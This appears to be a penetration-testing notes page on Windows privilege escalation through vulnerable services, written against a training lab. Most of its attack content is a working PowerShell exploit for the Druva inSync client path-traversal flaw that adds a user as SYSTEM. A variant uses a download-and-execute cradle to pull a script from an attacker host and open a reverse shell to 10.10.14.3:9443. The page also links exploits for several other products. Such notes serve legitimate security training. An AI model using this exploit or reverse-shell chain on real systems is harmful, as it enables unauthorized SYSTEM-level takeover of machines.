# Vulnerable Services

## **Enumerating Installed Programs**

```cmd-session
C:\htb> wmic product get name

Name
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4023057)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127
VMware Tools
Druva inSync 6.6.3
Microsoft Update Health Tools
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4480730)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127
```

{% embed url="<https://www.exploit-db.com/exploits/49211>" %}

{% embed url="<https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/>" %}

### **Enumerating Local Ports**

```cmd-session
C:\htb> netstat -ano | findstr 6064

  TCP    127.0.0.1:6064         0.0.0.0:0              LISTENING       3324
  TCP    127.0.0.1:6064         127.0.0.1:50274        ESTABLISHED     3324
  TCP    127.0.0.1:6064         127.0.0.1:50510        TIME_WAIT       0
  TCP    127.0.0.1:6064         127.0.0.1:50511        TIME_WAIT       0
  TCP    127.0.0.1:50274        127.0.0.1:6064         ESTABLISHED     3860
```

### **Enumerating Process ID**

```powershell-session
PS C:\htb> get-process -Id 3324

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    149      10     1512       6748              3324   0 inSyncCPHwnet64
```

### **Enumerating Running Service**

```powershell-session
PS C:\htb> get-service | ? {$_.DisplayName -like 'Druva*'}

Status   Name               DisplayName
------   ----               -----------
Running  inSyncCPHService   Druva inSync Client Service
```

## Druva inSync Windows Client Local Privilege Escalation Example

### Powershell PoC

```powershell
$ErrorActionPreference = "Stop"

$cmd = "net user pwnd /add"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
```

#### Reverse shell

{% embed url="<https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1>" %}

Rename it something simple like `shell.ps1.` Append the following at the bottom of the script file

```shell-session
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443
```

Modify the `$cmd` variable to get rs&#x20;

```powershell
$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3:8080/shell.ps1')"
```

<https://github.com/yevh/CVE-2020-5752-Druva-inSync-Windows-Client-6.6.3---Local-Privilege-Escalation-PowerShell-/blob/main/DruvaPE.ps1>

```
$ErrorActionPreference = "Stop"

#Modify the $cmd variable in the Druva inSync exploit PoC script to download our PowerShell reverse shell into memory.
$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.4:8080/shell.ps1')"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

#changing the IP to match our address and listening port as well
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443
```

**Catching a SYSTEM Shell**

Execute the PoC PowerShell script on the target host after bypassing execution policy

{% content-ref url="../../internal-pentest/bypass-powershell-execution-policy" %}
[bypass-powershell-execution-policy](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/bypass-powershell-execution-policy)
{% endcontent-ref %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FC5WHMCHVKWkhpg2BEkV9%2Fimage.png?alt=media&#x26;token=906da006-f333-4849-aecf-c734313154e2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F5OSfm5hAKBjqBa6t822X%2Fimage.png?alt=media&#x26;token=8cb8c7e4-54d6-4915-ad0e-2acf1aff5eac" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FVkbtfAUn23XCfssLDCXd%2Fimage.png?alt=media&#x26;token=089ac12d-710f-4285-bdf9-2e83d9dc3c64" alt=""><figcaption></figcaption></figure>

## SysaxAutomation

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FRfOEkxnNetWOBeJpaBr0%2Fimage.png?alt=media&#x26;token=1e52b908-836b-4104-b199-ce330fef689e" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.exploit-db.com/exploits/50834>" %}

## iTunes - CVE-2024-44193

iTunes version 12.13.2.3

{% embed url="<https://github.com/mbog14/CVE-2024-44193>" %}

## Teamviewer

{% content-ref url="../../public-exploit/teamviewer" %}
[teamviewer](https://0xss0rz.gitbook.io/0xss0rz/pentest/public-exploit/teamviewer)
{% endcontent-ref %}

## AnyDesk

Before v9.0.1.

{% content-ref url="../../public-exploit/anydesk" %}
[anydesk](https://0xss0rz.gitbook.io/0xss0rz/pentest/public-exploit/anydesk)
{% endcontent-ref %}